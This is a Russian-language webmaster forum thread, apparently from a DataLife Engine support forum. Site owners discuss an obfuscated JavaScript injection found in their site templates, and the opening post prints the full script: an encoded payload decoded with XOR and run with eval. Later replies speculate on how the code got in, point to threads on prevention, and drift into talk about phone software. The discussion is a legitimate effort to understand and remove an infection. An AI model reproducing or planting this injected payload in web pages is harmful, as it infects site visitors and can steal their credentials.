Перейти к публикации

Рекомендованные сообщения

Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания

<script language='javascript' type='text/javascript'>var pingTar;pingTar='%54%56%5b%56%53%55%57%52%21%56%59%65%5c%6a%4b%42%6c%77%78%16%17%4b%5b%40%4e%62%48%16%4b%54%63%7c%0b%06%2e%22%5a%42%47%59%78%75%49%48%65%41%1b%41%57%5b%51%5b%7f%79%47%5c%28%47%52%08%57%77%75%4a%56%1f%5e%6d%50%55%41%54%55%57%1f%1e%62%4a%50%46%4e%4a%52%58%1e%18%5d%5a%75%49%17%50%4d%53%35%41%51%61%0f%48%56%11%56%5e%5d%42%6e%55%45%1f%4e%56%5d%57%17%46%53%62%65%4f%6f%5a%4e%2d%24%0b%32%1f%55%59%59%67%14%77%47%5d%56%66%70%13%0d%3f%20%0b%18%4c%45%0a%42%78%54%6b%75%54%5e%64%4a%7b%04%50%40%53%59%41%4a%48%75%0a%50%6f%4b%56%03%03%57%5a%5d%4e%53%1c%4f%6e%58%56%13%46%01%6f%45%48%14%7c%50%44%71%12%2a%1d%51%1a%4b%71%54%6d%17%6c%50%0a%7b%40%56%10%67%46%64%5f%1d%1d%16%73%45%4d%65%51%51%69%12%25%0a%1e%2c%31%3d%08%02%38%1a%3b%34%69%49%5b%0f%49%5b%48%4b%1a%57%58%57%53%45%6d%2c%5a%18%59%56%3d%38%18%10%1b%58%43%43%60%66%43%17%43%50%5b%4f%51%0e%24%13%03%4a%54%4e%4c%43%74%47%1d%1e%56%18%59%77%73%4e%72%6c%5b%5d%0a%49%55%0e%3e%1d%18%50%1b%42%5a%45%59%4e%77%57%40%6a%19%0e%1d%5d%64%7b%57%1f%13%52%48%2f%0e%6d%1f%0b%59%42%53%59%14%38%63%44%54%4a%1e%13%14%33%01%67%52%56%49%69%09%4e%50%5a%6a%18%4d%1a%3c%09%58%55%54%66%4d%56%6e%5a%0c%32%04%4d%3f%48%1d%01%51%11%68%5a%1d%3c%43%57%02%4e%51%53%4a%54%7c%3e%1a%44%70%5b%57%15%5f%74%5a%53%15%59%71%57%5a%50%69%68%43%12%4f%54%0e%0b%68%6f%46%01%61%4c%45%53%4e%40%24%76%56%6b%51%3d%43%15%4b%7b%54%3f%5c%0a%5f%4b%5f%56%79%7e%5d%33%41%55%0b%4e%47%68%07%2b%0d%03%1c%1a%5e%56%66%52%4a%5d%7d%10%41%4a%04%23%01%67%4b%56%54%0b%46%4e%65%74%6d%4f%14%17%19%10%15%6d%48%4d%56%33%50%5e%40%67%6c%48%06%18%1a%77%56%42%52%42%50%06%57%52%7d%58%0b%07%67%55%6d%54%63%0a%55%11%1c%2f%23%5b%57%65%4a%5a%0e%2e%7f%45%4a%7d%59%50%5a%45%45%59%45%14%12%1a%07%2e%55%65%47%50%45%51%1e%1e%57%61%63%1f%10%0b%1e%48%53%69%49%23%5a%56%58%7e%75%5d%58%6b%4f%5e%4e%1d%32%09%47%72%7e%6a%54%0e%36%01%1d%0a%0f%68%42%63%4f%55%54%0e%36%01%61%43%65%5e%0b%48%71%5a%59%66%14%19%7c%4b%79%45%17%44%7e%52%6e%51%11%41%1a%64%54%7f%3c%0f%5b%50%5d%58%1d%62%7a%49%4c%50%19%1c%2a%53%05%7f%30%49%73%7c%74%6b%5c%43%16%45%09%7a%05%7f%08%1d%71%62%16%3d%45%56%4e%5c%58%45%74%74%66%23%0e%7a%57%53%16%78%7c%4a%5b%72%49%55%27%13%36%4f%51%42%51%76%7d%45%64%68%7f%24%63%1c%70%48%5e%10%6b%1f%50%59%4b%5c%4d%4a%01%1e%16%56%09%42%5c%5d%57%6b%47%4b%7b%48%62%0d%5a%18%53%38%41%5f%50%1f%50%54%5d%47%64%1b%27%14%09%18%18%58%6d%44%5a%44%1b%40%1d%1b%4f%2e%43%70%4f%14%45%44%5b%08%61%1b%58%49%5a%6d%48%74%55%69%41%54%42%77%5f%77%68%5c%3a%15%51%43%61%5e%19%02%13%6d%20%5d%42%06%12%08%05%4b%6d%45%19%45%72%55%67%42%40%65%6f%70%54%0e%41%48%50%42%2d%4e%5c%41%60%55%4b%7f%5c%64%4b%33%5c%5b%5f%57%47%77%62%5d%2e%1d%43%14%53%5f%47%46%58%71%4e%7b%62%5d%0e%04%77%73%4b%51%65%41%4c%32%12%26%7e%13%06%04%02%01%32%06%78%70%51%5c%42%53%5a%53%4f%60%6d%51%13%79%54%42%31%53%66%51%15%02%57%54%69%5b%4c%47%49%68%02%4e%57%51%45%0f%7d%78%56%53%55%55%10%0a%46%4b%19%5d%76%69%4d%47%62%78%7a%0f%03%08%03%51%7f%59%04%04%59%5c%0f%4c%5f%45%12%25%25%0d%0e%50%03%46%5a%2f%5e%67%31%5b%03%0e%42%45%7f%73%03%52%5f%50%06%50%56%46%6f%41%44%04%7b%59%55%11%66%7e%45%43%4b%11%14%0c%44%70%78%15%56%4d%57%6a%7d%50%58%73%59%52%58%38%4d%46%41%4d%5e%48%4c%75%58%45%3a%0b%07%21%78%5f%73%17%6f%4e%41%74%76%5e%4e%6f%76%0b%60%77%64%65%6b%43%5b%46%4d%6e%59%43%63%20%5c%42%43%7b%55%29%50%71%08%31%13%49%54%49%12%48%54%47%45%7d%56%09%16%1f%0a';function conMap(pastThe){function bosMaskMax(badLogPong){var fiTabCow=0;var maskMidWil=badLogPong.length, nutNull=0;while(nutNull<maskMidWil){fiTabCow+=beChar(badLogPong,nutNull)*maskMidWil;nutNull++;}return (fiTabCow+'');}function beChar(conGun,catNs){return conGun['cZhZaZrzCSoldSeSAZtZ'.replace(/[ZlzSG]/g, '')](catNs);}if((new String(document.write)).indexOf('arity')>0){return;}var nanoLoop=0,pisAb=0,nsPut=98;var bcMid='';var onRar=(new String(conMap)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var tipBedPip=bosMaskMax(onRar);pastThe=window['u{n@e#s#c@a0pme@'.replace(/[m#@\{0]/g, '')](pastThe);for(var itExit=0; itExit < (pastThe.length); itExit++){var mapMegaMap=beChar(onRar,nanoLoop);var onMapFog=beChar(tipBedPip,pisAb);var conWho=mapMegaMap^onMapFog^nsPut;var cpGun=beChar(pastThe,itExit);nanoLoop++,pisAb++;bcMid+=String['fDr6oDmICIhba6rbC6o9dDe6'.replace(/[bI69D]/g, '')](cpGun^conWho);if(pisAb>tipBedPip.length)pisAb=0;if(nanoLoop>onRar.length)nanoLoop=0;}window['e<v]a]lf'.replace(/[#\.f\]\<]/g, '')](bcMid);return bcMid=new String();}conMap(pingTar);</script>

На всех трех сайтах, во всех страницах main.tpl во всех шаблонах! Не особо удивился ы ,еслиб только у меня, но также у знакомого обнаружен данный баг! Везде движки оригиналы! Что за фигня такая? Подумал на хостера, но у нас хостеры разные... У кого то есть еще подобное????

Ссылка на сообщение
Поделиться на других сайтах

Я же написал, чистый

Вчера человеку на tutdesign.ru удаляли! Поменялипаоли на фтп, сегодня опять код появился, что может быть такое??????

Ссылка на сообщение
Поделиться на других сайтах

Я же написал, чистый

Вчера человеку на tutdesign.ru удаляли! Поменялипаоли на фтп, сегодня опять код появился, что может быть такое??????

Может модуль какой установили нехороший ?

Ссылка на сообщение
Поделиться на других сайтах

Лично у меня все только стандартными средствами движка, ничего стороннего и лишнего нет! Можете сайт глянуть в подписи, но тем не менее правка кода была обнаружена и не пойму как это произошло!

Ссылка на сообщение
Поделиться на других сайтах

==========

кстати по своему сайту моб софта. у меня трубка 5600 xpress music,, чё там для неё нарыть мона ?? дай ссылки на категории для неё )) а то симбианы незнаю какие версии )) 9 ?

Чтото я несмог нати в исходнике что либо лишее кроме ровного кода )

Ссылка на сообщение
Поделиться на других сайтах

Такой модели я не слышал и на сайте nokia.ru такой тоже нет... Ежели Вы имели ввиду 5610 xpress music, то это 40 серия и у меня нет раздела для данной трубки, это не симбиан! Вы уточните модель точней!

==========

кстати по своему сайту моб софта. у меня трубка 5600 xpress music,, чё там для неё нарыть мона ?? дай ссылки на категории для неё )) а то симбианы незнаю какие версии )) 9 ?

Чтото я несмог нати в исходнике что либо лишее кроме ровного кода )

Я ждать не собираюсь пока кто-то отхватит вирусы! Есесвенно код был удален уже!!!

Ссылка на сообщение
Поделиться на других сайтах

Модель уточнил, 5800 )))

=======

а вот сам теперь буду сидеть, вдруг что-то на самом деле, бекап уже сделал ))

а какой хостинг ?

а где был код ? в начала или конце ??

Ссылка на сообщение
Поделиться на других сайтах

Nokia 5800 это Symbian 9.4, тебе сюда http://www.mobile-soft.su/symbian-9-4/

А код был сразу после тэга <body> и он довольно большой, из 1-го поста видно!

Ссылка на сообщение
Поделиться на других сайтах

Спасиб.

Честно незнаю, пока у меня такого нет, может мой сайт не такой известный чтобы был повод его взламывать )) хотя версия 8.2 когда была ломанули ))

Ссылка на сообщение
Поделиться на других сайтах

Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания

почему новые? Уже ниодин год. Читайте темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

много полезной информации о причинах и методах предотвращения.

Ссылка на сообщение
Поделиться на других сайтах

Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания

почему новые? Уже ниодин год. Читайте темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

много полезной информации о причинах и методах предотвращения.

интересно, задумывался только если пароли сохранять в браузере или нет. А вот по поводу остального недумал. Т.е. заходишь на сайт, получаешь скриптовый вирус на комп, а он уже шлёт пассы все, умно сделанно, будем думать что да как!

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...